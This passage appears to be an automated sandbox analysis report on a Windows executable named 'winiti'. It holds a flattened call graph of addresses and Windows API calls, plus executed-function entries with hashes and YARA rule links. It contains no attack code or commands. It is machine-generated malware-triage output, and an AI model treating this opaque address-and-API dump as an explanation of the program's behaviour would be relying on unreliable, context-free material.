API calls 15989->15991 15990->15984 15992 13f61e6bd 15991->15992 15992->15984 16151 13f602690 InitializeCriticalSection 15992->16151 15997 13f5fdd64 15994->15997 15995 13f658fd0 _swprintf_c_l 3 API calls 15996 13f5fddcd 15995->15996 15998 13f658fd0 _swprintf_c_l 3 API calls 15996->15998 16001 13f5fde85 ISource 15996->16001 15997->15995 15999 13f5fddf8 15997->15999 15998->15999 15999->16001 16006 13f5faea0 GetCurrentThreadId 15999->16006 16001->15927 16003 13f5fe13c 16002->16003 16004 13f5fe135 16002->16004 16003->15923 16007 13f5fdb70 16004->16007 16006->16001 16008 13f5fdb9a _swprintf_c_l 16007->16008 16009 13f658fd0 _swprintf_c_l 3 API calls 16008->16009 16010 13f5fdbc1 16008->16010 16009->16010 16010->16003 16012 13f602911 VirtualFree 16011->16012 16013 13f602929 16011->16013 16012->15945 16013->15945 16018 13f63043f 16014->16018 16015 13f630462 16089 13f602a80 16015->16089 16016 13f63046c 16017 13f602a00 3 API calls 16016->16017 16021 13f63047d 16017->16021 16018->16015 16018->16016 16022 13f630497 16018->16022 16021->16022 16100 13f6029e0 VirtualFree 16021->16100 16022->15950 16026 13f61f35f 16024->16026 16027 13f61f37c 16026->16027 16101 13f601f70 16026->16101 16027->15952 16029 13f61ce32 16028->16029 16030 13f658fb0 8 API calls 16029->16030 16031 13f61cf53 16030->16031 16032 13f602a00 16031->16032 16033 13f602a44 GetCurrentProcess VirtualAllocExNuma 16032->16033 16034 13f602a25 VirtualAlloc 16032->16034 16033->15956 16034->16033 16041 13f61fb0e 16035->16041 16036 13f61fb18 16037 13f658fb0 8 API calls 16036->16037 16038 13f61f924 16037->16038 16038->15959 16038->15961 16039 13f61fec3 EnterCriticalSection 16040 13f61fef0 LeaveCriticalSection 16039->16040 16039->16041 16040->16041 16041->16036 16041->16039 16041->16040 16043 13f61ffe1 LeaveCriticalSection 16041->16043 16044 13f61ffb7 16041->16044 16108 13f602930 16041->16108 16046 13f61ffed 16043->16046 16045 13f61ffc0 EnterCriticalSection 16044->16045 16044->16046 16045->16043 16046->16036 16048 13f620025 EnterCriticalSection LeaveCriticalSection 16046->16048 16111 13f6029c0 VirtualFree 16046->16111 16048->16046 16112 13f632fb0 16049->16112 16052 13f61ed00 16058 13f61ed30 16052->16058 16053 13f61f311 16134 13f601e10 CloseHandle 16053->16134 16054 13f61f31d 16056 13f61f332 16054->16056 16057 13f61f326 16054->16057 16056->15965 16135 13f601e10 CloseHandle 16057->16135 16060 13f601eb0 4 API calls 16058->16060 16085 13f61ed8f 16058->16085 16061 13f61edcf 16060->16061 16062 13f601eb0 4 API calls 16061->16062 16061->16085 16063 13f61ede5 _swprintf_c_l 16062->16063 16063->16085 16118 13f602080 16063->16118 16065 13f61f10a 16066 13f601eb0 4 API calls 16065->16066 16067 13f61f187 16066->16067 16068 13f61f1c9 16067->16068 16071 13f601eb0 4 API calls 16067->16071 16069 13f61f2c9 16068->16069 16070 13f61f2bd 16068->16070 16068->16085 16074 13f61f2d2 16069->16074 16075 13f61f2de 16069->16075 16130 13f601e10 CloseHandle 16070->16130 16072 13f61f19d 16071->16072 16072->16068 16125 13f601e30 16072->16125 16131 13f601e10 CloseHandle 16074->16131 16077 13f61f2f3 16075->16077 16078 13f61f2e7 16075->16078 16079 13f61f2fc 16077->16079 16077->16085 16132 13f601e10 CloseHandle 16078->16132 16133 13f601e10 CloseHandle 16079->16133 16083 13f61f1b3 16083->16068 16084 13f601eb0 4 API calls 16083->16084 16084->16068 16085->16053 16085->16054 16086 13f61f277 16085->16086 16086->15965 16087->15946 16088->15965 16090 13f602b46 GetLargePageMinimum 16089->16090 16091 13f602aae LookupPrivilegeValueW 16089->16091 16094 13f602b83 GetCurrentProcess VirtualAllocExNuma 16090->16094 16095 13f602b66 VirtualAlloc 16090->16095 16092 13f602aca GetCurrentProcess OpenProcessToken 16091->16092 16093 13f602b7f 16091->16093 16092->16093 16096 13f602b01 AdjustTokenPrivileges GetLastError CloseHandle 16092->16096 16097 13f658fb0 8 API calls 16093->16097 16094->16093 16095->16093 16096->16093 16098 13f602b3b 16096->16098 16099 13f602bb6 16097->16099 16098->16090 16098->16093 16099->16021 16100->16022 16102 13f601f78 16101->16102 16103 13f601f91 GetLogicalProcessorInformation 16102->16103 16107 13f601fbd ISource 16102->16107 16104 13f601fb2 GetLastError 16103->16104 16105 13f601fc4 16103->16105 16104->16105 16104->16107 16106 13f602001 GetLogicalProcessorInformation 16105->16106 16105->16107 16106->16107 16107->16027 16109 13f60294b VirtualAlloc 16108->16109 16110 13f60296e GetCurrentProcess VirtualAllocExNuma 16108->16110 16109->16041 16110->16041 16111->16046 16113 13f632fc9 16112->16113 16117 13f61fa9c 16112->16117 16114 13f632fe4 LoadLibraryExW 16113->16114 16113->16117 16115 13f633012 GetProcAddress 16114->16115 16114->16117 16116 13f633027 16115->16116 16116->16117 16117->16052 16119 13f6020b7 GetCurrentProcess 16118->16119 16120 13f60216f GlobalMemoryStatusEx 16118->16120 16121 13f6020d0 16119->16121 16123 13f6020d8 16120->16123 16121->16120 16121->16123 16122 13f658fb0 8 API calls 16124 13f602248 16122->16124 16123->16122 16124->16065 16126 13f658fd0 _swprintf_c_l 3 API calls 16125->16126 16127 13f601e56 16126->16127 16128 13f601e5e CreateEventW 16127->16128 16129 13f601e7e ISource 16127->16129 16128->16129 16129->16083 16130->16069 16131->16075 16132->16077 16133->16085 16134->16054 16135->16056 16136->15977 16138 13f62168d 16137->16138 16139 13f6216e3 EnterCriticalSection 16138->16139 16141 13f621767 16138->16141 16143 13f621700 16139->16143 16140 13f6217c1 16152 13f61e7a0 16140->16152 16141->16140 16144 13f602930 3 API calls 16141->16144 16142 13f6217b1 LeaveCriticalSection 16145 13f6217bd 16142->16145 16143->16142 16147 13f621745 LeaveCriticalSection 16143->16147 16148 13f62178d 16144->16148 16145->15977 16147->16141 16148->16140 16149 13f621791 16148->16149 16149->16145 16150 13f62179b EnterCriticalSection 16149->16150 16150->16142 16151->15984 16153 13f61e7d1 16152->16153 16154 13f61e965 16153->16154 16155 13f61e954 16153->16155 16156 13f61e94f DebugBreak 16153->16156 16154->16145 16155->16154 16157 13f61e960 DebugBreak 16155->16157 16156->16155 16157->16154 16158->15898 16160 13f5fb34f 16159->16160 16161 13f5fb355 SetThreadPriority ResumeThread CloseHandle 16159->16161 16160->15900 16161->15900 16163 13f604383 _swprintf_c_l 16162->16163 16167 13f6043a9 ISource _swprintf_c_l 16163->16167 16171 13f605300 16163->16171 16165 13f6043a0 16166 13f5fb410 InitializeCriticalSectionEx 16165->16166 16165->16167 16166->16167 16167->15908 16167->16167 16169 13f5fb3f0 DeleteCriticalSection 16168->16169 16170 13f6045f2 16169->16170 16172 13f602a00 3 API calls 16171->16172 16173 13f605322 16172->16173 16174 13f60532a 16173->16174 16175 13f602930 3 API calls 16173->16175 16174->16165 16176 13f605348 16175->16176 16179 13f605353 _swprintf_c_l 16176->16179 16180 13f6029e0 VirtualFree 16176->16180 16178 13f60546e 16178->16165 16179->16165 16180->16178 16182 13f5fb1ee GetProcAddress 16181->16182 16183 13f5fb203 16181->16183 16182->16183 16183->15699 16185 13f5fb19e GetProcAddress 16184->16185 16186 13f5fb1b3 16184->16186 16185->16186 16186->15701 16188 13f5fb234 16187->16188 16188->16188 16189 13f5fb23d GetStdHandle WriteFile 16188->16189 16189->15696 16190 13f5f9500 16191 13f5f951f 16190->16191 16192 13f5f9542 16191->16192 16202 13f5fb2e0 CreateThread 16191->16202 16194 13f5f9534 16195 13f5f953d 16194->16195 16196 13f5f9549 16194->16196 16205 13f5ffc10 16195->16205 16209 13f5ffcf0 16196->16209 16199 13f5f9559 16200 13f5ffc10 CloseHandle 16199->16200 16201 13f5f9563 16200->16201 16203 13f5fb309 CloseHandle 16202->16203 16204 13f5fb304 16202->16204 16203->16194 16204->16194 16206 13f5ffc1f 16205->16206 16207 13f5ffc34 16205->16207 16206->16207 16208 13f5ffc28 CloseHandle 16206->16208 16207->16192 16208->16207 16210 13f5ffd1d 16209->16210 16211 13f5ffd77 16209->16211 16212 13f5ffd9e 16210->16212 16214 13f5ffd58 16210->16214 16211->16199 16213 13f5fad00 4 API calls 16212->16213 16213->16211 16216 13f5fad00 16214->16216 16217 13f5fad3c SetLastError CoWaitForMultipleHandles 16216->16217 16218 13f5fad25 WaitForMultipleObjectsEx 16216->16218 16219 13f5fad6a 16217->16219 16220 13f5fad7e 16217->16220 16218->16220 16219->16220 16221 13f5fad6e SetLastError 16219->16221 16220->16211 16221->16220 16222 13f5f6620 16227 13f5f6645 16222->16227 16223 13f5f6659 16224 13f5f671f 16225 13f5f673f 16224->16225 16226 13f5f6726 16224->16226 16230 13f5f676f 16225->16230 16244 13f5f63b0 GetLastError 16225->16244 16229 13f5fb220 2 API calls 16226->16229 16227->16223 16227->16224 16232 13f5f66c8 16227->16232 16233 13f5f66e7 16227->16233 16236 13f5f6706 16227->16236 16231 13f5f6732 RaiseFailFastException 16229->16231 16231->16225 16235 13f5f66d0 Sleep 16232->16235 16233->16236 16237 13f5f66f9 RaiseFailFastException 16233->16237 16235->16233 16235->16235 16238 13f5f4c30 16236->16238 16237->16236 16239 13f5f4c56 16238->16239 16243 13f5f4c74 16239->16243 16247 13f5facc0 FlsGetValue 16239->16247 16241 13f5f4c6c 16242 13f5f5920 6 API calls 16241->16242 16242->16243 16243->16224 16245 13f5f63e0 16244->16245 16246 13f5f6406 SetLastError 16245->16246 16248 13f5facda RaiseFailFastException 16247->16248 16249 13f5face8 FlsSetValue 16247->16249 16248->16249 16250 13f5f9480 16251 13f5f949f 16250->16251 16252 13f5f9498 16250->16252 16266 13f5f62a0 16251->16266 16260 13f5f4cc0 16252->16260 16255 13f5f94bc 16275 13f5ffcc0 16255->16275 16257 13f5f94cc 16278 13f5fe1d0 16257->16278 16261 13f5f4ced 16260->16261 16262 13f5facc0 3 API calls 16261->16262 16265 13f5f4d0b 16261->16265 16263 13f5f4d03 16262->16263 16284 13f5f5920 16263->16284 16265->16251 16267 13f5f62b8 GetCurrentThreadId GetCurrentProcess GetCurrentThread DuplicateHandle 16266->16267 16268 13f5f6366 16266->16268 16269 13f5faa30 VirtualQuery 16267->16269 16268->16255 16270 13f5f632c 16269->16270 16271 13f5f633a RaiseFailFastException 16270->16271 16272 13f5f6347 16270->16272 16271->16272 16273 13f5fdcc0 4 API calls 16272->16273 16274 13f5f634f 16273->16274 16274->16255 16276 13f5ffcca 16275->16276 16277 13f5ffcd1 SetEvent 16275->16277 16276->16257 16277->16257 16280 13f5fe20a 16278->16280 16282 13f5fe22f _swprintf_c_l 16278->16282 16279 13f5f94d6 16280->16279 16281 13f5fdd40 4 API calls 16280->16281 16281->16282 16282->16279 16283 13f658fd0 _swprintf_c_l 3 API calls 16282->16283 16283->16282 16285 13f5f594f 16284->16285 16292 13f5faa30 VirtualQuery 16285->16292 16288 13f5f59a0 RaiseFailFastException 16289 13f5f59ad 16288->16289 16294 13f5fdcc0 16289->16294 16291 13f5f59b5 16291->16265 16293 13f5f599c 16292->16293 16293->16288 16293->16289 16295 13f5fdcd2 16294->16295 16296 13f5fdcda 16294->16296 16295->16291 16297 13f5fdd40 4 API calls 16296->16297 16298 13f5fdd25 16296->16298 16297->16298 16298->16291 16299 13f608602 16300 13f608608 16299->16300 16323 13f619420 16300->16323 16303 13f608644 16327 13f602880 QueryPerformanceCounter 16303->16327 16306 13f608662 16328 13f5fa4d0 16306->16328 16308 13f6087a5 16311 13f6086c5 16308->16311 16344 13f61a150 16308->16344 16315 13f6089d0 16311->16315 16320 13f608954 16311->16320 16373 13f602880 QueryPerformanceCounter 16311->16373 16313 13f6087ea 16313->16311 16365 13f61d950 16313->16365 16316 13f619420 SwitchToThread 16315->16316 16318 13f6089db 16316->16318 16322 13f6089fe 16318->16322 16382 13f6028d0 SetEvent 16318->16382 16374 13f5fa170 16320->16374 16324 13f608626 16323->16324 16325 13f61943f 16323->16325 16324->16303 16338 13f6028c0 ResetEvent 16324->16338 16325->16324 16326 13f619481 SwitchToThread 16325->16326 16326->16325 16327->16306 16329 13f5fa4e5 16328->16329 16333 13f5fa548 16329->16333 16391 13f5fae00 EventEnabled 16329->16391 16331 13f5fa51f 16331->16333 16392 13f5fa690 EventWrite 16331->16392 16383 13f5f5140 16333->16383 16337 13f5fa59c 16337->16308 16337->16311 16339 13f619650 16337->16339 16341 13f619670 16339->16341 16340 13f61d950 11 API calls 16340->16341 16341->16340 16342 13f6196da 16341->16342 16410 13f61d200 16341->16410 16342->16308 16348 13f61a165 16344->16348 16345 13f61a24d 16346 13f60d210 24 API calls 16345->16346 16351 13f61a25f 16346->16351 16347 13f61a264 16349 13f61e7a0 2 API calls 16347->16349 16348->16345 16348->16347 16362 13f61a169 16348->16362 16350 13f61a28a 16349->16350 16350->16351 16353 13f61a2a1 EnterCriticalSection LeaveCriticalSection 16350->16353 16352 13f613f10 7 API calls 16351->16352 16358 13f61a300 16351->16358 16351->16362 16354 13f61a2e6 16352->16354 16353->16351 16356 13f61a2ea 16354->16356 16354->16358 16355 13f61a3a8 DebugBreak 16357 13f61a3b7 16355->16357 16359 13f616690 5 API calls 16356->16359 16357->16362 16364 13f61a3cb DebugBreak 16357->16364 16358->16355 16360 13f61a36b DebugBreak 16358->16360 16361 13f61a388 DebugBreak 16358->16361 16363 13f61a39f 16358->16363 16359->16362 16360->16358 16361->16358 16362->16313 16363->16355 16363->16357 16364->16362 16367 13f61d966 16365->16367 16366 13f61d997 16366->16311 16367->16366 16368 13f61da00 16367->16368 16369 13f5fe020 4 API calls 16367->16369 16494 13f6304d0 16368->16494 16369->16368 16372 13f5fe020 4 API calls 16372->16366 16373->16320 16375 13f5fa17d 16374->16375 16379 13f5fa1af 16374->16379 16505 13f5fae00 EventEnabled 16375->16505 16377 13f5fa190 16377->16379 16506 13f5fa640 EventWrite 16377->16506 16380 13f5fa1fe 16379->16380 16509 13f5fae00 EventEnabled 16379->16509 16380->16315 16384 13f5f517f 16383->16384 16385 13f5f51a4 FlushProcessWriteBuffers 16384->16385 16386 13f5f51d0 16385->16386 16387 13f5f52a3 16386->16387 16388 13f5f5209 16386->16388 16390 13f5f523e SwitchToThread 16386->16390 16387->16337 16395 13f5fae00 EventEnabled 16387->16395 16388->16386 16396 13f5f5ea0 16388->16396 16390->16386 16391->16331 16393 13f658fb0 8 API calls 16392->16393 16394 13f5fa6fa 16393->16394 16394->16333 16395->16337 16397 13f5f5ec7 16396->16397 16398 13f5f5ea7 16396->16398 16397->16388 16398->16397 16399 13f5faf4e 16398->16399 16400 13f5faf22 LoadLibraryExW GetProcAddress 16398->16400 16401 13f5fafaa SuspendThread 16399->16401 16402 13f5faff8 16399->16402 16408 13f5faf94 GetLastError 16399->16408 16400->16399 16401->16402 16403 13f5fafb8 GetThreadContext 16401->16403 16404 13f658fb0 8 API calls 16402->16404 16405 13f5fafef ResumeThread 16403->16405 16407 13f5fafd2 16403->16407 16406 13f5fb008 16404->16406 16405->16402 16406->16388 16407->16405 16408->16402 16409 13f5faf9f 16408->16409 16409->16401 16420 13f61d0a0 16410->16420 16412 13f61d211 16413 13f61d2f6 DebugBreak 16412->16413 16415 13f61d2b9 DebugBreak 16412->16415 16416 13f61d2d6 DebugBreak 16412->16416 16417 13f61d328 16412->16417 16418 13f61d2ed 16412->16418 16414 13f61d305 16413->16414 16414->16417 16419 13f61d319 DebugBreak 16414->16419 16415->16412 16416->16412 16417->16341 16418->16413 16418->16414 16419->16417 16426 13f61d0c2 16420->16426 16421 13f61d115 16431 13f60d210 16421->16431 16423 13f61d128 16427 13f61d1e5 16423->16427 16438 13f61f550 16423->16438 16424 13f61d130 16425 13f61e7a0 2 API calls 16424->16425 16429 13f61d152 16425->16429 16426->16421 16426->16424 16427->16412 16429->16423 16430 13f61d1a2 EnterCriticalSection LeaveCriticalSection 16429->16430 16430->16423 16432 13f60d239 16431->16432 16432->16432 16434 13f60d367 16432->16434 16457 13f624c30 16432->16457 16435 13f60d4ef 16434->16435 16436 13f621660 9 API calls 16434->16436 16435->16423 16437 13f60d516 16436->16437 16437->16423 16439 13f61f605 16438->16439 16440 13f61f569 16438->16440 16439->16427 16461 13f613f10 16440->16461 16442 13f61f5eb 16443 13f616690 5 API calls 16442->16443 16445 13f61f5f8 16443->16445 16445->16427 16446 13f61f58c 16447 13f61f591 16446->16447 16448 13f61f5ce 16446->16448 16449 13f61f5b1 16447->16449 16450 13f61f596 16447->16450 16451 13f616690 5 API calls 16448->16451 16453 13f616690 5 API calls 16449->16453 16467 13f616690 16450->16467 16454 13f61f5de 16451->16454 16456 13f61f5c1 16453->16456 16454->16427 16455 13f61f5a4 16455->16427 16456->16427 16458 13f624c49 16457->16458 16460 13f624c94 16457->16460 16459 13f61fae0 18 API calls 16458->16459 16458->16460 16459->16458 16460->16434 16462 13f613fd4 16461->16462 16463 13f613f50 16461->16463 16462->16439 16462->16442 16462->16446 16463->16462 16475 13f613e10 16463->16475 16466 13f613e10 7 API calls 16466->16462 16468 13f6166c7 16467->16468 16469 13f6166e9 _swprintf_c_l 16468->16469 16485 13f630630 16468->16485 16471 13f6167d0 16469->16471 16492 13f6029c0 VirtualFree 16469->16492 16471->16455 16473 13f616795 16473->16471 16474 13f6167a3 EnterCriticalSection LeaveCriticalSection 16473->16474 16474->16471 16476 13f613ea1 16475->16476 16477 13f613e53 EnterCriticalSection 16475->16477 16480 13f602930 3 API calls 16476->16480 16478 13f613e7d LeaveCriticalSection 16477->16478 16479 13f613e70 16477->16479 16478->16476 16479->16478 16481 13f613ee1 LeaveCriticalSection 16479->16481 16482 13f613eb2 16480->16482 16483 13f613eed 16481->16483 16482->16483 16484 13f613ec0 EnterCriticalSection 16482->16484 16483->16462 16483->16466 16484->16481 16493 13f6029c0 VirtualFree 16485->16493 16487 13f63064a 16488 13f630694 16487->16488 16489 13f63065b EnterCriticalSection 16487->16489 16488->16469 16490 13f630685 LeaveCriticalSection 16489->16490 16491 13f63067e 16489->16491 16490->16488 16491->16490 16492->16473 16493->16487 16495 13f630509 EnterCriticalSection 16494->16495 16501 13f630595 16494->16501 16498 13f630529 LeaveCriticalSection 16495->16498 16496 13f61da29 16496->16366 16496->16372 16497 13f602930 3 API calls 16499 13f6305c6 16497->16499 16498->16501 16499->16496 16502 13f6305d7 EnterCriticalSection 16499->16502 16501->16496 16501->16497 16503 13f6305f6 16502->16503 16504 13f6305fd LeaveCriticalSection 16502->16504 16503->16504 16504->16496 16505->16377 16507 13f658fb0 8 API calls 16506->16507 16508 13f5fa689 16507->16508 16508->16379 16509->16380 16514 13f60b118 16515 13f60b11d 16514->16515 16516 13f60b170 16514->16516 16524 13f62e8f0 16515->16524 16519 13f61d950 11 API calls 16516->16519 16518 13f60b21a 16520 13f60b245 16518->16520 16532 13f621840 16518->16532 16519->16515 16536 13f612680 16520->16536 16523 13f60b2b0 16525 13f62e909 16524->16525 16529 13f62e919 16524->16529 16525->16518 16526 13f62ea4b SwitchToThread 16526->16529 16527 13f62e969 SwitchToThread 16527->16529 16528 13f62ea57 16528->16518 16529->16526 16529->16527 16529->16528 16530 13f62ea1c SwitchToThread 16529->16530 16531 13f62ea07 SwitchToThread 16529->16531 16530->16529 16531->16529 16533 13f62185f 16532->16533 16534 13f6218ca _swprintf_c_l 16532->16534 16533->16534 16541 13f602bd0 VirtualAlloc 16533->16541 16534->16520 16537 13f621840 2 API calls 16536->16537 16538 13f6126b5 _swprintf_c_l 16537->16538 16539 13f62e8f0 4 API calls 16538->16539 16540 13f612805 16539->16540 16540->16523 16540->16540 16542 13f602c0b 16541->16542 16543 13f602c1c 16541->16543 16542->16543 16544 13f602c10 VirtualUnlock 16542->16544 16543->16534 16544->16543 16545 13f60df5b 16548 13f62ea80 16545->16548 16547 13f60df33 16547->16547 16551 13f60abf0 16548->16551 16550 13f62eab8 16550->16547 16552 13f60ac47 16551->16552 16553 13f62e8f0 4 API calls 16552->16553 16556 13f60affa 16552->16556 16558 13f60ad45 _swprintf_c_l 16553->16558 16554 13f621840 2 API calls 16555 13f60af31 16554->16555 16555->16556 16557 13f612680 6 API calls 16555->16557 16556->16550 16557->16556 16558->16554 16558->16555 16510 13f620750 16511 13f62078d 16510->16511 16513 13f6207b7 16510->16513 16512 13f602080 10 API calls 16511->16512 16512->16513 16559 13f5fa7a1 16560 13f5fa774 16559->16560 16561 13f5fa7b3 16559->16561 16566 13f6075d1 16561->16566 16570 13f607420 16561->16570 16574 13f60744e 16561->16574 16562 13f5fa7d4 16567 13f6075b0 16566->16567 16567->16566 16569 13f607499 16567->16569 16582 13f609e40 16567->16582 16569->16562 16571 13f607592 16570->16571 16573 13f607499 16570->16573 16572 13f609e40 3 API calls 16571->16572 16571->16573 16572->16573 16573->16562 16575 13f6074b5 16574->16575 16576 13f60748b 16574->16576 16592 13f60cf30 16575->16592 16578 13f607494 DebugBreak 16576->16578 16581 13f607499 16576->16581 16578->16581 16579 13f6074d8 16580 13f609e40 3 API calls 16579->16580 16579->16581 16580->16581 16581->16562 16583 13f609e76 16582->16583 16587 13f609eaf 16582->16587 16584 13f609e89 SwitchToThread 16583->16584 16583->16587 16589 13f6028e0 16583->16589 16584->16583 16586 13f609f85 ISource 16586->16569 16587->16586 16588 13f609f80 DebugBreak 16587->16588 16588->16586 16590 13f6028e4 SleepEx 16589->16590 16591 13f6028ed 16589->16591 16590->16591 16591->16583 16599 13f60cf5f 16592->16599 16593 13f630880 WaitForSingleObject 16593->16599 16594 13f624b90 GetTickCount64 16594->16599 16596 13f60d019 SwitchToThread 16596->16599 16597 13f60d13b 16597->16579 16599->16593 16599->16594 16599->16596 16599->16597 16601 13f613670 39 API calls 16599->16601 16602 13f60d045 SwitchToThread 16599->16602 16603 13f6028e0 SleepEx 16599->16603 16604 13f60d00d SwitchToThread 16599->16604 16605 13f60dbe0 16599->16605 16624 13f6306c0 16599->16624 16638 13f60d660 16599->16638 16601->16599 16602->16599 16603->16599 16604->16599 16606 13f60ddd2 16605->16606 16607 13f60dc1c 16605->16607 16608 13f60ddd7 16607->16608 16609 13f60dc8d 16607->16609 16608->16606 16652 13f607080 16608->16652 16611 13f60dc9c SwitchToThread 16609->16611 16615 13f60dcaa 16611->16615 16612 13f60dd51 SwitchToThread 16612->16615 16615->16606 16615->16612 16616 13f60dd7d SwitchToThread 16615->16616 16617 13f6028e0 SleepEx 16615->16617 16623 13f60dd45 SwitchToThread 16615->16623 16648 13f630880 16615->16648 16616->16615 16617->16615 16623->16615 16625 13f630869 16624->16625 16626 13f6306dd 16624->16626 16625->16599 16627 13f602080 10 API calls 16626->16627 16628 13f630704 16627->16628 16629 13f630857 16628->16629 16630 13f607080 WaitForSingleObject 16628->16630 16629->16599 16632 13f63073d 16630->16632 16631 13f630840 16631->16599 16632->16631 16633 13f6307c9 SwitchToThread 16632->16633 16634 13f6307f5 SwitchToThread 16632->16634 16635 13f6028e0 SleepEx 16632->16635 16636 13f630880 WaitForSingleObject 16632->16636 16637 13f6307bd SwitchToThread 16632->16637 16633->16632 16634->16632 16635->16632 16636->16632 16637->16632 16639 13f60d80b 16638->16639 16640 13f60d69c 16638->16640 16640->16639 16641 13f6028e0 SleepEx 16640->16641 16643 13f60d6df 16641->16643 16642 13f60d78a SwitchToThread 16642->16643 16643->16639 16643->16642 16644 13f60d7b6 SwitchToThread 16643->16644 16645 13f6028e0 SleepEx 16643->16645 16646 13f630880 WaitForSingleObject 16643->16646 16647 13f60d77e SwitchToThread 16643->16647 16644->16643 16645->16643 16646->16643 16647->16643 16649 13f630896 16648->16649 16650 13f6308cd 16649->16650 16656 13f602c40 WaitForSingleObject 16649->16656 16650->16615 16653 13f607098 16652->16653 16657 13f602c40 WaitForSingleObject 16653->16657

                  Executed Functions

                  Function 000000013F5F5760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 000000013F5FB020: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013F5F576B), ref: 000000013F5FB02B
                    • Part of subcall function 000000013F5FB020: QueryInformationJobObject.KERNEL32 ref: 000000013F5FB0FE
                    • Part of subcall function 000000013F5FAEC0: GetModuleHandleExW.KERNEL32(?,?,?,?,000000013F5F3819), ref: 000000013F5FAED1
                  • RtlAddVectoredExceptionHandler.NTDLL ref: 000000013F5F57D8
                    • Part of subcall function 000000013F5FD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F5FD8AD
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                  • String ID: StressLogLevel$TotalStressLogSize
                  • API String ID: 2876344857-4058818204
                  • Opcode ID: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction ID: 24b4dd3771dca8d0ee0ffc585fa9c8cca617629fed13a26e2f0b721e2424645b
                  • Opcode Fuzzy Hash: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction Fuzzy Hash: 12418F32E20B40C2FA45AF20E4057D97791EB81788F5950B9EE491B69ADB74DB0FC780
                  Function 000000013F602260 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                  • String ID: @$@$@
                  • API String ID: 2645093340-1177533131
                  • Opcode ID: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction ID: 46e77daee8be629534e7fbb8e4f7f9b7c1e76057e2711fbd4e5fd337285e7d02
                  • Opcode Fuzzy Hash: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction Fuzzy Hash: 52514F71709AD0C6EB758F15E4553DAB7A0F788B90F544139CAAE53B98CF7CC5468B00
                  Function 000000013F6026B0 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000016.00000002.484273853.000000013F5F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013F5F0000, based on PE: true
                  • Associated: 00000016.00000002.484269813.000000013F5F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484293452.000000013F72B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484302621.000000013F78B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F850000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484316095.000000013F857000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 00000016.00000002.484325200.000000013F85F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_13f5f0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                  • String ID:
                  • API String ID: 580471860-0
                  • Opcode ID: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction ID: f9540d22c785dbdc9a25028f9203d8efec715113c337322d56a6f854b2d091be
                  • Opcode Fuzzy Hash: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction Fuzzy Hash: 4751DFB2A18749C7EB448F19E9493D877B1FB49B84F94003AD94E87369EB38C647CB00
                  Function 000000013F5FB020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013F5F576B), ref: 000000013F5FB02B
